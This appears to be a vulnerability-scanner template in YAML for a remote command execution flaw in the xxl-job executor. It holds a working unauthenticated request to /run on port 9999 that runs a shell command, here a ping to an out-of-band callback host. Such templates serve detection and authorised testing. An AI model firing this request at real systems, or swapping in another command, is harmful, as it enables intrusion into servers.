id: xxl-job-executor-rce

info:
  name: xxl-job executor 命令执行
  author: zan8in
  severity: high
  verified: false
  tags: xxl-job,rce
  created: 2023/08/22

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
  host: request.url.domain
rules:
  r0:
    request:
      method: POST
      host: "{{host}}:9999"
      path: /run
      body: |
        {
          "jobId": 1,
          "executorHandler": "demoJobHandler",
          "executorParams": "demoJobHandler",
          "executorBlockStrategy": "COVER_EARLY",
          "executorTimeout": 0,
          "logId": 1,
          "logDateTime": 1586629003729,
          "glueType": "GLUE_SHELL",
          "glueSource": "ping {{reverseHost}}",
          "glueUpdatetime": 1586699003758,
          "broadcastIndex": 0,
          "broadcastTotal": 0
        }
    expression: reverse.wait(5)
expression: r0()